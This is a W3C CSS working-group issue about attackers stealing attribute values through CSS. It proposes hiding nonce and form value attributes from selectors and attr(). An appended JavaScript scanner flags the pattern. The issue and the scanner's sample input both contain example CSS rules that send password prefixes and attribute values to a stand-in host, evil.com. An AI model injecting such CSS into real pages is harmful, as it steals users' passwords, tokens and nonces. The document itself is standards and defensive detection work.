[csswg-drafts] [selectors][css-values] Hide "sensitive" attributes from CSS (#5136)

tabatkins has just created a new issue for https://github.com/w3c/csswg-drafts:

== [selectors][css-values] Hide "sensitive" attributes from CSS ==
For a long time, data-exfiltration attacks have been possible using CSS attribute selectors; with careful use of a streaming stylesheet, an attacker can start with `input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);}` (etc. for b-z), then, based on that result, stream in another set like `[value^="ha"]`, `[value^="hb"]`, etc., and eventually steal the entire attribute value.

This can be used to get script nonces from a page, CSRF tokens from a form, and, in some DOM libraries that live-reflect input values into the `value` attribute, it can steal usernames and passwords as well.

We have plans to introduce a `url()` variant that can take functions in its value, a `concat()` function for joining strings together, and now have a more powerful `attr()` function that can be used anywhere to fetch the value of an attribute. Combined, these would make the exfiltration attacks trivial; slipping in a simple `style="background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));"` would grab the attribute in one go, no cleverness required beyond the initial CSS injection.

Since "concat a URL fragment with an attr value" is actually one of the *main use-cases* for the concat() function, it would be unfortunate to lose that entirely. And doing so wouldn't stop the more complex exfiltration outlined at the start of this message anyway.

@mikewest, in <https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ>, suggests hiding "sensitive" attributes from CSS entirely: `nonce`, `value` on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with `attr()`.

This seems completely reasonable to me; there's no reasonable use-case for `nonce` to be usable in CSS, and the use-cases for extracting `value` (displaying in an error message displayed in a `::before`?) are weak enough that I'm happy to remove that.

Thoughts?
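As an added, defender-side example (not code from the issue or from the CSSWG drafts): a small heuristic scanner that flags the two shapes described above, the per-character attribute-selector probe and the one-shot `attr()`-into-a-fetching-function leak, in a stylesheet or an inline `style` value. The sensitive-attribute list, the `fetch()` name (taken from the issue's hypothetical example), and the sample CSS are assumptions/constructed input.

```javascript
// Added example, not code from the csswg-drafts issue. Regex-based heuristic,
// not a CSS parser (nested @media blocks are not handled); the attribute list
// is an assumption, extend it for your application.
const SENSITIVE_ATTRS = new Set(["nonce", "value"]);

// selector { declarations }
const RULE_RE = /([^{}]+)\{([^{}]*)\}/g;
// [name op "value"]: captures the attribute name and the operator (=, ^=, $=, *=, ~=, |=)
const ATTR_SELECTOR_RE = /\[\s*([A-Za-z_:][\w:.-]*)\s*([~|^$*]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)[^\]]*\]/g;
// attr(name ...) inside a declaration value
const ATTR_FN_RE = /\battr\(\s*([A-Za-z_:][\w:.-]*)/g;
// Functions that trigger a network load: url()/src()/image-set(), plus the
// hypothetical fetch() variant mentioned in the issue (assumed name).
const REMOTE_LOAD_RE = /\b(?:url|src|image-set|fetch)\(/i;

function scanRule(selector, decls, sensitive) {
  const findings = [];
  if (!REMOTE_LOAD_RE.test(decls)) return findings; // no channel to leak through
  for (const [, name, op] of selector.matchAll(ATTR_SELECTOR_RE)) {
    // Attribute selector on a sensitive attribute plus a remote load:
    // the streaming, character-by-character probe.
    if (sensitive.has(name.toLowerCase())) {
      findings.push({ kind: "attribute-probe", attr: name, op, selector });
    }
  }
  for (const [, name] of decls.matchAll(ATTR_FN_RE)) {
    // attr() of a sensitive attribute feeding a fetching function: the one-shot leak.
    if (sensitive.has(name.toLowerCase())) {
      findings.push({ kind: "attr-leak", attr: name, selector });
    }
  }
  return findings;
}

function findCssExfiltrationPatterns(css, sensitive = SENSITIVE_ATTRS) {
  // A bare declaration list (e.g. a style="" attribute value) has no selector block.
  if (!css.includes("{")) return scanRule("(inline style)", css, sensitive);
  const findings = [];
  for (const [, selector, decls] of css.matchAll(RULE_RE)) {
    findings.push(...scanRule(selector.trim(), decls, sensitive));
  }
  return findings;
}

// Constructed sample: the issue's probing rule, a nonce probe, and two benign rules.
const SAMPLE_CSS = `
input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);}
script[nonce*="ab"] { background: url(https://evil.com/n?x=ab); }
input[type="checkbox"]:checked { color: green; }
a[href^="https://"]::after { content: attr(href); }
`;
const SAMPLE_INLINE =
  'background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));';

console.log(findCssExfiltrationPatterns(SAMPLE_CSS));    // two attribute-probe findings
console.log(findCssExfiltrationPatterns(SAMPLE_INLINE)); // one attr-leak finding
```

Run it over stylesheets and `style` attributes that untrusted content can influence; a hit is a review signal, not proof of an attack, and the early return on rules without a loading function keeps benign attribute selectors quiet.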

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5136 using your GitHub account

Received on Friday, 29 May 2020 17:40:33 UTC